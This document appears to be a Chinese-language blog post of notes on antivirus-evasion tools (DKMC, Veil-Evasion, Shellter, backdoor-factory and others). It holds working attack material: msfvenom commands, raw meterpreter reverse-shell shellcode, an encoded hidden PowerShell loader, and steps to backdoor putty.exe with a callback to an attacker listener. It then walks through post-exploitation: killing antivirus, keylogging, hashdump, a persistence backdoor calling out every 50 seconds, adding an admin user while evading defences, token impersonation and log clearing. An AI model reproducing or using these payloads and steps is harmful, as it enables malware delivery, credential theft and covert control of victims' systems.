免杀工具汇总
今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。
DKMC
项目地址:
可以创建一个 outputs 文件夹 存放 shellcode
启动
python dkmc.py
操作顺序:
Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码
Gen :是将其 msf 的 shellcode 注入到 BMP 图片中
Ps :将其 BMP 的图片转换为 powershell 代码
Web :将其开启 web 功能
第一步,先生成原始的 shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk
第二步,生成 shellcode ,将生成的 shellcode 保存到文本里,exit 退出
\xdb\xc3\xb8\xa4\x85\xc1\x7d\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\xbb\x83\xee\xfc\x31\x46\x15\x03\x46\x15\x46\x70\x7f\xa8\x6b\x01\xd8\x8e\xb0\x2f\xac\x14\xc2\x8f\x64\x9c\x9b\x84\xf4\xf1\x27\xd5\x8d\x1c\xd4\x61\x63\xfd\xfa\xba\x23\xe1\xb9\xc7\xeb\x94\xb7\x28\x3c\xd4\xb1\x88\x12\x39\x15\xca\x37\xcb\xd2\x6a\x10\xf9\x60\x8d\x08\xaa\x69\xb2\x5e\x4b\x1f\x16\x2c\x74\x50\xb2\xd7\x88\xe7\x21\x13\xd6\x29\x40\x06\x24\xfc\x02\x4c\x8a\x77\x1f\x5f\xf5\xed\x47\xb7\x38\x63\xaf\x2e\x6e\xbe\x22\xed\xa5\xf8\x61\x8b\x17\x19\xb7\x46\x63\x28\x96\x73\x70\x94\x93\x44\xcf\xe5\x92\x68\x34\x2f\x1f\x61\xaa\xa2\x87\x79\x29\x9b\xe3\x59\x3a\x62\xe1\xf2\x0f\x3d\xfc\x5f\xec\xc5\xee\xe2\xc1\x56\x38\x1b\x76\x98\x5e\xd4\x02\x92\x81\xd4\x25\xf0\x46\x68\x67\x2a\xc6\x9d\xf7\x9b\xf8\x0c\x35\xca\xbb\x48\x70\xe1\x26\x06\xce\x46\x48\x6d\x34\x99\x1e\xa3\x52\x70\x4d\x41\xa3\x68\x8f\x4a\x60\x27\xb5\x21\x74\x76\x82\xf3\x7d\x58\x5d\xd6\x07\x6a\x86\xc2\xaa\x72\xd2\x60\xee\x7f\xad\x3f\x7d\x3f\xd1\x7a\x39\xcd\x5b\x04\xc2\xc7\x1c\x28\xbe\x89\x5c\xa9\x9f\x51\xf7\x7d\xea\x26\x87\x33\x3d\x96\xb2\x20\x7f\x30\x92\x72\xc7\x0c\x03\x5d\xba\xeb\xd2\x09\x58\xfb\xfd\xde\xe1\xf3\xf3\xa2\x62\xa5\xee\x2a\xeb\xcd\x38\xe9\xb9\x2d\x51\x98\x79\xae\x85\x25\x1b\xd9\x08\x95\x86\xb9\xb6\x31\x7b\x87\xf5\x56\x8a\xd7\x6f\xdd\x79\xb7\x37\xb0\x27\xeb\xde\xdc\x9b\xaa\x59\xcc\x0e\x3f\x9d\xe6\xc6\x17\x51\x5a\x87\x4c\xb9\x43\xa3\xb2\x55\x83\x0b\x8a\xdb\xa9\xf8\xee\x3e\xf3\xd3\x5d\xb4\xf8\x96\x68\x9f\x1c\x92\xad\x59\x2c\x56\x0a\xee\x5a\xf7\x74\x98\x23\xce\xa1\x4f\xad\x06\xa4\xdd\xa4\xa8\x18\x45\xe9\x62\x32\x9d\x14\x6c\xb7\x4d\x5a\x0d\x81\xe2\x3e\xbc\x27\x05\xfc\x60\x25\xc9\xb9\x96\x57\xcc\xef\xa3\x27\x30\x31\xa8\x5b\xda\x0f\x13\x28\x6f\x4e\x69\x4a\x5c\x99\x31\xd1\xcf\xa6\x27\x8f\xd6\xd0\xc2\xe4\xf6\x36\xb8\xef\x63\x81\xf4\xed\xac\xe3\xa0\xba\x63\x94\x73\x18\xcf\x9d\x6c\xe4\x9d\x75\x2b\xb2\xea\xe2\xb7\xfe\x15\x95\x18\x1f\x25\xfa\x66\x50\x2e\x70\xd8\xf2\x31\xdf\x93\xe6\xe0\xfd\x04\x4f\xc6\xc9\x4a\xb6\xec\x69\x2a\xa5\x13\x9d\x54\x5e\x5a\x99\xc0\x23\x49\x31\x96\x6e\x5f\x87\xa0\x6d\x6c\x02\x0f\xa5\x61\xb7\x8c\x2f\x94\x6f\x53\x4e\xcf\x53\x81\xcd\x87\xa9\x1a\xa5\xe2\x6e\xfc\x0b\xb7\x01\x4c\xb1\xdf\x72\x51\xbe\xb2\x39\x70\xe4\xcf\x12\x45\x79\xc1\x5e\xb4\xa3\xfa\x5d\xc5\x96\xe8\xac\x28\x5a\xd8\xef\x0a\x12\x4e\x8f\xab\xb2\x65\x64\x3d\xa3\xe5\x61\xf9\x9f\xe0\x97\x66\x0b\x44\x9e\xc6\xee\x85\xb6\x5e\xce\x86\xd7\x52\xc9\x63\x57\x88\x9d\xdd\x07\x37\x6b\xfb\xb6\x97\xa3\x8f\x24\xea\x48\xc5\x6f\xe9\x93\x3c\x56\xf9\xd9\x3c\x90\x59\x7d\x8e\xa4\x47\xc2\x58\xf5\xa8\xe4\xde\x82\x0c\x63\xd2\xeb\xbb\xd0\xe6\xf0\x82\x2b\x1e\xd0\xef\xb0\x61\xdb\x39\x01\x61\x32\x31\x1a\x47\x32\xf1\x72\x68\x20\x7b\xcd\x1a\x71\x60\xa5\x32\xd1\x7b\xcc\xe2\xd3\xa3\xa0\x5a\x7d\x44\x1a\xec\x48\xc6\x2b\xb0\x66\x1a\xb1\x84\x59\x62\x88\x49\xa6\x94\xfc\xc3\xd2\xeb\x7a\x21\xc6\xac\x01\xb5\xe7\x65\xe9\xb2\x12\x31\xf0\xdd\xfe\x61\x4a\xca\xeb\x03\x90\x3f\xf4\xda\x88\x51\xbe\xe6\x4d\x3e\x2d\xf5\x9f\xb3\xbc\x06\x92\xbe\x8a\xc0\xca\x76\x33\x01\x11\x73\xf8\x1d\x21\xab\x44\xc2\xfc\x6e\x2f\xa6\x8f\x51\xa0\x94\x63\xce\x02\x69\x0b\x37\xca\xa5\x3e\x90\x3b\x9a\x10\x2f\xdb\xce\x4c\xe1\xd2\xbb
第三步,启动 gen 功能,将 shellcode 注入到图片中,设备图片位置和 shellcode 参数,
output 文件夹下生成一个注入 shellcode 图片,exit 退出到菜单界面
第四步,将图片转换成 powershell 文件,保存成为 dk.ps1 格式
run
powershell.exe -nop -w hidden -enc JABoAGsAYwByAGEAbABsAEQAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBIADQAcwBJAEMATABPADgAUAAxADAAQwAvAHoARQAxAE4AagBRADAATgBUAGcAeABOAGoATQB1AE8AVABVACEAdABWAFoAdABiAHgAbwA1AEUAUAA0AGUASwBmAC8AQgBxAGwAYgBhAFgAVwBuAFoAawBKACEAMgBFAFYASwBsAEUAUABMAFMAWAAhAHIAbABJACEAbAAzAFIAMQBGAGwAZABnAGQAdwA2AHIAVQBYADIANQB1AEUATgB2AG4AdgBOADEANQAyAGcAUwBpADAAVABYAFcANgA1AFEATgArAG0AYgBGAG4AbgBuAG4AOAAyAEUANwBTADcANAAvAEkAZQAzAEwAawBiAG0AKwBOAE0AeABFAFoASgBnAFgAaABZAGsAYQArAGIAMgArAFIANAB1AHQAUQBSAFIAUABpAE8AWABkAFUAZgBVAGwAawBuAEgARQBJAFMATgA1AEoAbABZAHcAZwB6AGgAVAA0AEsAMgBNAEgAegBKADkAdABYAE4AIQBiAE4ATgBMADAAUgBDAGEAVQBpAFcARwA5ADMAcwB5AFUAIQBtAEUAVwAvAGYAIQBjAFQARQBOAHIAUwBFAGEAYwBnAGYAWgA4ADgAawBqADYAVQAxAEIAUQArAFQAUwA2AGgAYwBpAFEANwA4AFQANQBFAHAANQB6AE8AYQBLADgATQBKAHMAMwBhAFQAUQBGAFUAbQBtAEkAMgBNADUAOQBsAEIARwAxAGcAWQBhADkAbABEAFAAagB1AFoAOAAvAHUALwA2AGcAcwBqAHMATQBUADIAYwBaADUAZABwAHoAZQAzAE4AdABJACEAbABqAHoAbAAyAGYAUABQAGwAMgB3ADYAdAA1AEMAcAA3AGIAWQBwAEcAUwBXAG8ANQBOADIARwBlAGkAdABoAGQAZQBDADAAMwBIADAATQBiAFYANwBxACEARgBaAGkAcABqADcAVwBJAHkAcQAzAFEAVQBtAEUAeQBKAFIAVgBaADIAbQBZAFcAUgA1ADIASwB6AGcAOQBrADMANABsAGkAQgBSAHAALwB3AFEAdAB6AEoAcgArACEANQBJAHUATQA4AEkARQBmAGUAbwBJAGkAaABtAHcAbgBEAEUAcwBCADUAIQAwAHEAbQBQAFYAQgAzAEwAIQBJAGQAZgBxACEAaQA1AHQAQwBGADgAZABCAHIAdwAzADIAWgArAG0AdQBkAHYASABVAG4AdABPAG8AWQA1AFEAZABZAG8AZwAxAGgAdAB2AEsASwBMAFQAeABkAC8AMgBXAGcAYQAyAFgAMQA4AFgAdABSAFcAbwBUAGoAeQBTAEsAeQBaAE0AZgBrAE0AdAAzACEAagB0AFYAIQArAFEAMwB5AEcAYwAhAE0AdgBJADcAVQBMAFAAZAA5AFQANgBvAEIAYQBXAEUAcwAxAEUAZwAxAHgANgA1AHoAcABUAEwAdwBoADIAUgBnADYAegBNAFkARABvAGwAegBPAFYAYgBaAGoAUQB4AGUAdQA5ADUAdQA2AFkAeQB1AHIAZgBQAGIATAB2ADkANwBsAGgATgA2AGMAQwBOAFoAUABGAHkAdAA4AHEAeQBxAHoAdQBUADYANABWAHMAMwB1ADQAbQBzADQAWQA5ADUAZQBnAEoAagBKAHUAQgBrAEwAbQBqAEMAbwBwAEsASwAzAHEAWgA2AHcAWgBoAEQAagBrADUAWQBtAHIAVQB4AFYATQA4AHQASgBpACEAKwAhAFEANABUAGEAbQB3AEYAIQBqAEoANAA2AFgAYQBhAE0ATABQADAAUABjADQAWQBqADAARQAxAEkAcQB5ADUAeABxAGkAUQBEAHYANwB6AFkAQgBaAEYAOQBkAHcATAAwAFkASQBFAGsAVgB6ADAAWABTAHoAZQBHACEAOAAhAGwATgBZAEYANgBlAGYAbAA3AHIAYQBQAFIAbQA2AFQAVQA2ADAARAAwAHMAbgB3AEIARQBZAEIANgBRAEgAbABFACEAZQBrAEkAVABRAHIAcABoAHEAWgBrAFgAbgBUAFgAWQBYAGIAeQByAGgAaABFAGQAVwBtAFgARwA3AG8AYgA0AEMAMAAyAEwAbwBwAGgAVABZAHEAaQA3AEQATwBDAE0ATgBWAEwANABXAEkAVQBXADUAUgBDAGMAZwBIAEYAcwBQAHgAdgBNAGMAbQBaAFEAagB1AFIAawB5AGEAbABIAE0AbQBKAHIAagBTAEgAZABZAEUAUgB5AHcAVwBQAFcAUABaAG8AegBEAGEAZwBpAGwAKwAyACEATgB6AGsAYQBRAGMARQByAFQASwBkAGUARwBNADAAdwBtAHEAUQBIAEcASwBjAHMATABSAEMAYwBUAHUAVAA4AEkAdABEADgAegBpAGQARgBpAE0AUwBuAEQAVwBnAHMAWABDADkANwBnADAAIQBiAGwAaAB5AHEARABTAFcATAB5AFgAbgBQAHUAUAAhAFoAVgBDAHMANAB5AHIAcQBhAEMAbwBtAEwAYwA0AGcAaQBWAEMAYgBVAEQAMQBnAGwARQBYAFoAaABsAG8AZwA1AEIAZwBCAGgAUgBMAGcAMgBNAG8AUwBRADkAegA2AHgAbABiAHcASgAhAEoAbAB0ADkAcgBiAHEAdQBaAFgARgBCAFgAdgBtAHMAdQB1AE4ASAB4ADMATgBpAHoANgBFAFQAOQBzAHoASAByAEgARgBzADEAZgA4AG4ANQBJAG8AdwBtAGEAcgBnAHcAUwBEAGgANQBMADcAaQBrADgAUQBrADEAMQBIAHMAegBOAFMAYQB0ADcAKwB6AHMANwBoADIARQBWAGYAegB0ADEAZwArAHIAaAA5AFUAZABtAFoAawAwAE0ANQBYAGQAdAArAC8AMgA5ADkAOABlADEAIQA3AGUAaABhAE0AawBmAFoATwBmAFQARwBjACsANgAvAEMAcgAwAFgAUQB0ADQAQgArAEoAWQBJAHMAcQBQAGEAVQBjAGcAMABkADEASwA2AGwANABKAHQAVgBaAEkAVgAhAGQAeQBhAHkASAA1ADkAbAByADcAQwBzAG8AIQBSAHkAVgBIAHUAKwBDAHMAbQB3AE4AegBtAFYAawA1AGQASQBxAEcAUwByADEAUQBqACsASAB5AE0ARgByAGIATgBiADIATgByAFoAOABzAGoAVAAwAFYAeQBwAGEARAB0AFgAcgAvADIAQwBNAFMASQBFAEMAcwB2ACEAagBpAEkAbQBaAEIAdABXAEgAVwByAFcASwBrAGwAZAA5ADIASwAvADYAcQB4AEwAKwBPAHIAVwBtAFQATwBkAGUAdQBWAHAAZwBWAGIATgBFAGEARwAwAFQAbgBtACsAeQB3AEUAOQAzAGUANQBmAC8ASwAzAGcARgBIADYAZgA0AEYALwA4AEMAdgBOAFgAWQBUADIAWgBmAEIAVwBnADEAVwBLAGIAOQBZAHUAYgA1AHcARwArAGgAKwA3AHUANQA5AHkAawB6AGEATgBoAEQATgBlAEsAdwBPACEAWQBiAEkAUwBpAG8AcwBuAGIATAAyAHIASQBnAEMAOABiAEYAWgA5ADgANgBuAC8AIQBJAHQAUABIAHkAMwBkADUAeQBqADIAegBwAEwAcwBaAGsATABXADMATgB2AHUARgBEAEIAMgBiAGsAMABGACsALwBaAGIAVwBoAHkAbABSAHUANQBRAGgAZgBSADYAbQA5AEIAegAyAG4ATAAyACsAZwBjADUAMwA0ADUATwBMADAATAAxAEwAMgB5AEIATwBwAFkAUAA0AE4AWABkAHYARAA1ADUASwBhAFoARgBhAEQAaQBKAE8ALwA4AGgANwBKAFAAZQBhAFIATAAvAEoASQB1AGgAIQBCAFAAbgBvAHEAZgA4AGgAUgByAGkANgAhADEAOABiADYAaAB2AG0AaQAxAGkAMgBmAC8AUgBkAGIAcQBvAE0AeQBKAHcAbwAhACEAIQA9AD0AIgAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACAAIgBBACIAKQApACkAOwAgACQAZwBKAGQAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAaABrAGMAcgBhAGwAbABEAGQALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAgAFsAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJABnAEoAZAApAC4ASQBuAHYAbwBrAGUAKAApAAoA
第五步,开启 web 功能,直接运行即可
>>> web (web)>>> set port 8080 [+] port value is set. (web)>>> run [+] Starting web server on port 8080 127.0.0.1 – – “GET /output-1496175261.bmp HTTP/1.1” 200 –
免杀测试
过特征检查,不过行为
msf shellcode 生成器和编码器-venom
项目地址:
git clone https://github.com/r00t-3xp10it/venom
使用:
shellcode 格式 都是以图形化 的方式呈现的,比较直观,悬着对应数字就行了。
输入 反弹 地址 lhost 和 端口 lport
选择 反弹 方式
输入 文件名
shellcode 生成之后 会自动 打开侦听器
生成的shellcode 在 /venom/output/ 目录下面
过特征,不过行为,可以实现短时间免杀,需要及时迁移进程
Green hat pro免杀工具使用
项目地址:https://github.com/Green-m/green-hat-suite
开始安装:
kali 上 安装:
gem install os apt-get install mingw-w64 apt-get install wine
windows上安装:
下载并install.ps1使用administartor权限运行。
安装将持续几个小时,请耐心等待。
使用
cd green-hat-suite/
ruby greenhat.rb 启动
短时间内天擎免杀,需要及时迁移进程避免被杀。
TheFatRat 免杀 工具
便捷化payload生成:
安装完成后使用fatrat命令启动
完全傻瓜式操作
设置文件名的时候无需加后缀!
avet 免杀 工具使用
进入 avet 文件夹内,进入 build 文件夹下,修改 global_connect_config.sh 文件,更改 kali IP 地址,端口 号为 7777,
运行: ./avet_fabric.py
免杀工具—Veil-Evasion
项目地址:https://github.com/Veil-Framework/Veil-Evasion Veil-Evasion是与Metasploit生成相兼容的Payload的一款辅助框架,并可以绕过大多 数的杀软。
git clone https://github.com/Veil-Framework/VeilEvasion.git
/setup.sh 安装
安装veil:
root@kali:~# apt-get update && apt-get install veil
启动veil:
root@kali:~# veil
Veil>: list 查看列表
[*] Available Tools:
1) Evasion
2) Ordnance
Veil>: use 1
Veil/Evasion>: list 查看具体的payload
Veil/Evasion>: use 9 使用序号为9的payload
[cs/meterpreter/rev_http>>]: options 查看需要配置的选项
set LHOST 192.168.199.165
[cs/meterpreter/rev_http>>]: generate 使用generate命令生成载荷文件
[>] Please enter the base name for output files (default is payload): backup 指定一个文件名backup
/var/lib/veil/output/compiled/backup.exe 生成的文件位置
接下来使用msf创建远程处理器
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.199.165
exploit
meterpreter> background 后台运行会话
sessions 查看会话详情
search bypassuac
use exploit/windows/local/bypassuac 使用本地提权模块
set SESSION 1
exploit
meterpreter>getuid 查看用户信息
meterpreter>getsystem 获取系统权限
run post/windows/gather/hashdump 获取hashdump
veil 启动veil
Main Menu
2 tools loaded 两个工具被加载
Available Tools: 可利用的工具
1) Evasion 规避免杀
2) Ordnance 工具箱
Available Commands:
exit Completely exit Veil 退出veil
info Information on a specific tool 查看工具详情
list List available tools 列出可用的工具
options Show Veil configuration 显示veil配置信息
update Update Veil 更新
use Use a specific tool 使用一个具体的工具
use 使用模块 1·
list 查看该模式下可用的payload
使用payload:use c/meterpreter/rev_tcp 或者use 7
设置反弹连接的ip以及端口
options 查看配置信息
generate 生成payload
输入要生成的文件名是veilshell.exe
veil 会同时生成多种场景的payload
[*] Language: c
[*] Payload Module: c/meterpreter/rev_tcp
[*] Executable written to: /var/lib/veil/output/compiled/veilshell.exe.exe 生成的可执行程序
[*] Source code written to: /var/lib/veil/output/source/veilshell.exe.c 生成的.c源文件
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/veilshell.exe.rc metasploit源文件
对于生成的.c源文件可以进行二次免杀处理,比如使用shellster 将shellcode注入可执行程序中等等。
shellter免杀
Kali Linux下安装shellter:
apt-get update
apt-get install shellter
启动shellter
(需要wine环境apt-get install wine32)
Kali 64位运行shellter会出错,原因是shellter只支持32位系统
kali linux 64位上安装32位的wine
在终端下输入
dpkg –add-architecture i386
apt-get update
apt-get install wine32
安装会有一个error提示 提示使用apt-get update来修复,那就继续输入apt-get update
apt-get install wine32
OK
这里我从百度下载一个putyy来进行测试,把它放在/root/目录下
安装好环境后启动shellter
root@kali:~# shelter
进入shellter控制台
这里有三个选项
A auto自动
M 高级设置
H help
这里我们使用A,PE Target输入exe程序的绝对路径
然后需要等待几分钟等待描绘完成
此处提示:是否进行注入,我们选择y
这里提示使用此处列表提供的payload还是使用自己设置,我们选择使用L
L list
C customs
H help
使用List索引1,即meterpreter_reverse_tcp(tcp反弹)
设置shellcode回连的IP以及端口,也就是我kali的ip和接收的端口8888
稍等片刻即可生成带有shellcode的putty.exe程序。
然后我们验证免杀效果(这里使用的是天擎的云查杀功能对该文件进行扫描无异常)
但是当我们点击程序进行运行的时候会报毒(这里猜测是天擎发现了程需主动回连行为,也就是基于行为的查杀)
然后我们打开msf设置攻击载荷,设置msf监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.199.165(设置本地监听地址)
set LPORT 8888(设置本地监听端口)
exploit
此时我们运行包含shellcode的可执行程序,并开始攻击
可以看到已经接收到了我本机192.168.199.205的会话,不过后续连接被天擎阻断了,
过了几分钟弹出病毒提示。
论安装杀软的必要性
成功拿到shell
使用migrate进行进程注入,以保证对目标机器的持续控制,
只要tasklist进程不中断,meterpreter就不会断
监听键盘输入记录,或自动将结果保存到txt文件中
新开一个终端,切换到/root/.msf4/loot下查看键盘记录信息,完美记录!
获取用户名以及密码的hash
新开msf使用hash进行登录
OK,登录成功了
抓包并保存为cap文件,可以使用wireshake打开查看
收集系统信息
持久控制,设置后门每50秒外连一次
重启服务器,后门开机启动,成功回连我们kali的1111端口,成功拿到shell
针对服务器的持久控制
首先生成一个shellcode,并将其上传至服务器
安装服务器后门程序,然后删除shell.exe(相当于在服务器生成了msf服务了)
进行监听设置
Insanity 免杀
git clone https://github.com/4w4k3/Insanity-Framework.git
安装依赖
cd Insanity-Framework
chmod +x install.sh
./install.sh
Cloning:
git clone https://github.com/4w4k3/Insanity-Framework.git
Running:
sudo python insanity.py
If you have another version of Python:
sudo python2.7 insanity.py
后门工具—the-backdoor-factory
原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp到代码段,来触发payload。
安装
或者apt-get install backdoor-factory 安装
检测是否支持后门植入
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -S
-f:指定测试程序
-S:检查该程序是否支持 patch
在确定其支持patch 后,我们再来查看其是否支持我们指定的 shellcode patch
测试裂缝空间size 200
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -c -l 200
-c:code cave(代码裂缝)
-l:代码裂缝大小
查看可注入的payload
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -s show
插入payload,并生成文件。
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.199.165 -P 4444
-s:选择使用 payload 类型
-H:选择回连服务器地址
-P:回连服务器端口
从返回结果可以看出putty.exe不能导入shellcode,我们使用之前metasploit生成的1111.exe的shell。
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/1111.exe -s iat_reverse_tcp_inline_threaded -H 192.168.199.165 -P 4444
ok,shellcode注入成功,新文件在backdoored目录下
对比原文件与生成文件MD5值
root@kali:~/the-backdoor-factory# md5sum backdoored/1111.exe /root/1111.exe
开启本地监听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.199.165
LHOST => 192.168.199.165
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
meterpreter持久控制PC机
进程迁移
run post/windows/manage/migrate(自动查找稳定的进程并切换)
关闭杀软
run killav
查看目标机所有流量
run packetrecorder -i 1
提取系统信息
run scraper
截屏、键盘记录、嗅探、获取域
持久控制
设置后门每50秒外连一次
run persistence -X -i 50 -p 1111 -r 192.168.199.165
run metsvc -A 安装后门
hashdump导出hash利用hash传送漏洞继续扩大战果。。。
输入shell进入cmd,创建简单的用户,当然实战中最好使用localgroup中已有的用户提升管理权限
顺便说一下,此处添加用户和将用户加入管理员组操作中使用ad,而没有使用add,主要是为了绕过部分防护软件的策略限制。
假冒令牌
假冒令牌攻击中需要使用kerberos协议,kerberos协议是一种网络认证协议,其设计目的是通过秘钥系统为客户机/服务器应用程序提供强大的认证服务。
使用impersonate_token假冒Administrator进行攻击(注意:用户名前两个反斜杠)
ok,可以看到假冒用户成功,此时就可以通过提升自己的权限在目标系统中进行任何操作了。
清除踪迹(清除日志)